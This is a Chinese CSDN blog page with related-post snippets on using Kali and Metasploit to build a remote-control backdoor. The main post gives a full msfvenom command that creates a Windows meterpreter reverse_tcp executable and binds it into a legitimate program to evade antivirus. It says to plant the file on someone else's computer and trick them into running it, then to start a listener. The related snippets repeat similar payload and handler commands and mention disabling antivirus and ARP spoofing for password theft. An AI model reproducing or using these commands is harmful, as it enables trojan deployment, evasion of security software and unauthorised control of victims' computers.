Kali:做个简单的远程监听程序

最新推荐文章于 2024-05-04 14:33:07 发布
最新推荐文章于 2024-05-04 14:33:07 发布
阅读量645 收藏 7
点赞数 5
CC 4.0 BY-SA版权
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75638644/article/details/136604597
本文详细描述了如何通过msfvenom工具在他人计算机上植入后门程序,利用永恒之蓝漏洞创建payload,并通过欺骗防火墙和诱导用户执行exe文件来获取权限。随后,作者展示了如何配置监听模块并执行操作以实现远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 首先进行如下的操作命令:

可以直接在当前目录下生成后门程序。

 别人计算机上被直接植入后面exe程序会被杀毒:

可以使用捆绑的命令-x,用来骗过部分防火墙软件。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.60.133 lport=4444 -f exe -x TxBugReport.exe -o demo.exe

 

成功在别人电脑上植入后门程序后,并且诱导其将exe运行后,我们可以使用远程监听模块了获取其后渗透的权限。

首先要先搜索到ms17_010永恒之蓝的漏洞,再使用其中的监听模块。

在模块中设置和后面程序一样的payload设置

比如:

set payload xxxx

set lhost xxxx

set port xxxx

然后就直接输入run命令就完事了。

日阙现实
关注
kali中对被控端的控制
ayyx111的博客
11-08 1475
msfvenom是Metasploit框架下用于生成 payload 的工具。它可以将各种攻击载荷(payload)与编码器、加密器等结合起来,生成可以在目标系统上执行特定功能(如创建反向连接)的可执行文件、脚本等多种格式的文件。msfconsole是一个命令行界面的交互式工具,用于访问和控制Metasploit框架的各种功能。通过msfconsole,安全专业人员可以利用Metasploit丰富的漏洞利用模块、payload、编码器等资源进行渗透测试,当然,恶意攻击者也可能会滥用它。
全网最详细:使用windows主机远程连接 kali MySQL
m0_67503765的博客
07-13 1849
首先kali 有自带的MySQL环境,我们主要启动MySQL环境就好了这是我们的结果——>use mysql创建一个用户进行授权MariaDB 是一个免费、开源的、全球最流行的关系数据库系统之一。它是 MySQL 数据库系统的直接替代品。然而,两个数据库系统的结构和索引是相同的。这允许您将数据库从 MySQL 切换到 MariaDB,而无需更改应用程序。默认情况下,MariaDB 配置为仅在本地主机上侦听。因此只能从与数据库在同一服务器上操作的本地用户访问它。
网络安全工程师教你Kali Linux:Nmap探测目标主机端口状态
Kali与编程
09-06 2451
一、背景介绍 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fin添加链接描述gerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 通常我们在进行渗透测试的过程中需要对目标主机的端口开放状态进行探测,从而了解目标主机,进行对应的测试。 二、资源装备 1.安装好Kali Linux虚拟机一台; 2.整装待发的小白一个。 三、战略安排 3.1 nmap基本语法使用查看,如下图所示。 命
端口监听测试
shy的博客
03-07 943
在工具当中经常会需要用到监听端口,用来接收一些数据或者shell、或者建立反向代理,但是时长监听不到数据,这个时候我们会想到是不是环境问题,防火墙问题、vps问题等等,但是首先要排除的就是监听问题。使用telnet 和 curl就可以在渗透过程中,排除监听问题了。kali上接收到数据,监听正常。使用telnet测试监听。1kali上开启监听。使用curl测试监听
Linux利用nc命令监控服务器端口的方法
11-12
最近碰到一个项目,前端用apache htttpd进行发布(80端口),通过双机负载均衡转发到后端的两个tomcat进行处理(8081和8082端口),现在需要随时监控这三个端口的情况,一旦down掉需要能够立即告警处理。批量的系统监控比较好的是用nagios软件来实现,这样小项目专门装一个nagios软件,有点繁琐了。在网上查了一些资料,总结实验了一下,可以用简单的nc命令来实现。
网络攻防——kali操作系统基本使用-调用摄像头
A
04-05 6528
kali的小小尝试
网络安全技术新手入门 利用Kali Linux生成简单远程控制木马_kali生成远程(1)
m0_60750088的博客
04-29 741
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4420
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
网络安全技术新手入门 利用Kali Linux生成简单远程控制木马_kali生成远程
2401_84297560的博客
05-04 546
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:新手阶段一般都用windows
网络安全技术新手入门 利用Kali Linux生成简单远程控制木马(2)
m0_54903333的博客
04-29 500
输入命令:msfconsole输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:
TxBugReport.exe
10-28
TxBugReport.exe
check bugreport自动分析bugreport工具
12-03
自动分析bugreport的工具,github开源项目
BugReport dump txt
04-27
c++dump为txt c++dump为txt c++dump为txt c++dump为txt
QQ截屏 bugreport
01-22
使用机型 小米手机4 TD-LTE 版本号 5.1.16 复现概率 90% ROM版本 体验版 问题描述 给予QQ ROOT权限,外部截屏不了,截屏会出现卡顿现象,截图会是全黑的图片 复现步骤 QQ-给予ROOT权限-允许显示悬浮窗-到QQ外部截图 BUG截图 -- LOG文件 -- 复测此BUG结果整合 原问题描述:给予QQ ROOT权限,外部截屏不了,截屏会出现卡顿现象,截图会是全黑的图片 复测次数&复现几率:5 / 100% 复测结果详细描述: 1、在QQ的“设置”--“辅助功能”-- 开启“摇动手机截屏”。 2、在系统“安全中心”--“应用权限管理”-- 把QQ的“显示悬浮窗”设置为允许。 3、返回,进入“安全中心”--“ROOT权限管理”-- 给予“QQ”ROOT权限。 4、在QQ外摇晃无法截屏,在QQ应用内可以正常截屏,没发现卡顿和截图全黑的现象。 复测Log文件: bugreport-0120-201308.zip (1.41 MB,
kali无线渗透之监听wifi网络1_kali 查看wifi发送的信息(1)
2401_84264727的博客
04-26 1065
是一个与802.11标准的无线网络分析有关的安全软件,主要功能包括网络侦测、数据包嗅探、WEP和破解。工具可以工作在任何支持监听模式的无线网卡上,并嗅探802.11a802.11b802.11g的数据。下面将对该工具进行详细介绍。是一个套件,在该套件中包括很多个小工具,如表3-2所示。
kali使用nc监听后,利用win7进行反弹shell
xiaochenhang的博客
08-15 1724
这里win7使用netcat进行反弹shell
Kali ARP断网攻击与流量监听
geek_Niko的博客
04-13 8494
如何借助Kali Linux系统内置的nmap、arpspoof、ettercap等渗透测试工具对局域网内同个网段的PC主机进行ARP欺骗和流量监听,实现断网攻击、密码窃取等
信安lab3:XSS漏洞和SQL注入
weixin_39974600的博客
02-11 1531
XSS漏洞和SQL注入相关的实验
【渗透测试】kali使用教程(一):常用命令和基本工具使用
热门推荐
u011871680的博客
12-03 4万+
kali教程
利用Kali Linux生成简单远程控制木马在metasp
最新发布
01-21
### 创建简单远程控制木马用于教育目的 对于渗透测试或安全研究的学习,在Kali Linux环境中利用Metasploit框架可以创建一个简单远程控制木马。这涉及几个具体的操作命令和步骤说明。 #### 准备工作环境 确保已安装并配置好最新的Metasploit框架版本[^1]: ```bash sudo apt update && sudo apt upgrade -y sudo apt install metasploit-framework ``` 启动`msfconsole`进入交互界面: ```bash msfconsole ``` #### 使用MSFvenom生成Payload 通过`msfvenom`工具来生成恶意软件载荷(Payload),这里以Windows平台为目标,创建一个反向TCP连接类型的payload文件[^2]: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_local_IP LPORT=desired_port -f exe > shell.exe ``` - `-p`: 指定要使用的有效负载(payload)。 - `LHOST`: 设置本地监听IP地址。 - `LPORT`: 设定端口号等待来自目标系统的回调请求。 - `-f exe`: 输出格式为可执行(.exe)文件。 - `shell.exe`: 保存路径及名称。 #### 配置监听器 回到`msfconsole`设置一个多处理器(Multi Handler)作为服务器端接收从客户端发起的连接尝试: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost your_local_IP set lport desired_port exploit -j -z ``` 以上操作将在后台运行多处理程序,并保持静默模式(-j选项表示将其放入作业列表中,-z则是在攻击成功后继续执行其他指令而不暂停)。 请注意,上述过程仅适用于合法授权下的实验环境内进行的安全测试活动;任何未经授权的实际网络攻击行为均属违法行为!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值